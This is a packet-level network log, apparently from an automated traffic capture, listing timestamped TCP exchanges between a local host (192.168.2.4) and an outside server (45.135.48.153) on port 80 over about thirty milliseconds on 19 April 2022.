Apr 19, 2022 16:44:44.277357101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.277523041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.277704000 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.277720928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.277780056 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.277782917 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.277937889 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.278008938 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.278060913 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.278197050 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.278259039 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.278306961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.278323889 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.278399944 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.278460026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.278587103 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.278640985 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.278702021 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.278863907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.278920889 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.278973103 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.279032946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.279078960 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.279148102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.279268026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.279311895 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.279385090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.279505014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.279551029 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.279599905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.279706955 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.279748917 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.279824972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.279953003 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.279999971 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.280073881 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.280194044 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.280234098 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.280306101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.280390024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.280431986 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.280483007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.280652046 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.280695915 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.280744076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.280883074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.280922890 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.280996084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.281114101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.281153917 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.281330109 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.281543970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.281584024 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.281807899 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.282037973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.282080889 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.282269955 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.282506943 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.282546997 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.282768965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.282998085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.283037901 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.283200979 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.283432961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.283471107 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.283586025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.283664942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.283703089 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.283824921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.283895016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.283934116 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.283978939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.284142971 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.284181118 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.284262896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.284383059 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.284421921 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.284504890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.284662962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.284703016 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.284748077 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.284785986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.284825087 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.284903049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.285022020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.285058975 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.285161018 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.285267115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.285341978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.285386086 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.285465002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.285506964 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.285583019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.285758018 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.285799026 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.285825968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.285943985 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.285990953 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.286073923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.286137104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.286192894 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.286284924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.286393881 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.286442041 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.286494970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.286608934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.286750078 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.286787987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.286825895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.286870003 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.286935091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.287072897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.287199974 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.287245035 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.287430048 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.287468910 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.287791014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.287867069 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.288127899 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.288177013 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.288347006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.288470984 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.288516998 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.288588047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.288628101 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.288712025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.288789988 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.288907051 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.288957119 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.289043903 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.289089918 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.289160013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.289274931 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.289388895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.289436102 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.289509058 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.289547920 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.289750099 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.290014029 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.290074110 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.290079117 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.290230989 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.290308952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.290349960 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.290429115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.290469885 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.290513992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.290673971 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.290745020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.290787935 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.290864944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.290903091 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.290986061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.291105032 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.291224957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.291270018 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.291301966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.291344881 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.291425943 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.291543961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.291663885 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.291711092 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.291790962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.291836977 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.291865110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.292026043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.292145967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.292190075 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.292221069 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.292259932 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.292385101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.292505026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.292584896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.292627096 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.292706013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.292743921 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.292814016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.292905092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.293025017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.293067932 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.293226957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.293253899 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.293267012 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.293385983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.293504000 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.293548107 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.293876886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.293900013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.293915987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.293925047 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.293961048 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.294065952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.294189930 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.294207096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.294275045 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.294277906 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.294318914 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.294390917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.294509888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.294565916 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.294615030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.294750929 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.294831038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.294893026 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.294995070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.295058012 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.295070887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.295191050 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.295310020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.295363903 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.295428038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.295670033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.295702934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.295726061 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.295744896 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.295748949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.295828104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.295871019 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.295949936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.296066999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.296228886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.296281099 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.296349049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.296387911 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.296425104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.296549082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.296669006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.296675920 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.296789885 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.296909094 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.296957016 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.297149897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.297198057 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.297349930 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.297631025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.297827959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.297887087 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.298069954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.298124075 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.298311949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.298588037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.298666954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.298727989 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.298748016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.298791885 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.298908949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.299025059 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.299108028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.299165964 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.299233913 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.299283981 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.299350977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.299468994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.299554110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.299607992 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.299671888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.299719095 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.299832106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.299916029 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.300026894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.300076008 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.300110102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.300153971 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.300232887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.300395012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.300483942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.300537109 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.300590992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.300641060 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.300673008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.300833941 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.300910950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.300960064 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.301008940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.301049948 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.301153898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.301270962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.301351070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.301393032 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.301472902 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.301512957 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.301579952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.301753998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.301831007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.301873922 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.301954031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.301995039 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.302037954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.302155018 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.302272081 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.302314043 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.302413940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.302453995 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.302509069 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.302589893 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.302700043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.302742958 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.302831888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.302871943 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.302927017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.303158998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.303175926 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.303215027 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.303313017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.303361893 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.303472042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.303591967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.303673029 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.303699970 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.303730011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.303769112 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.303874016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.304013014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.304060936 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.304069996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.304193020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.304290056 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.304338932 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.304425001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.304464102 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.304508924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.304672956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.304749966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.304795980 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.304871082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.304909945 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.304991007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.305109024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.305181980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.305229902 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.305351973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.305393934 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.305427074 CEST	80	49758	45.135.48.153	192.168.2.4
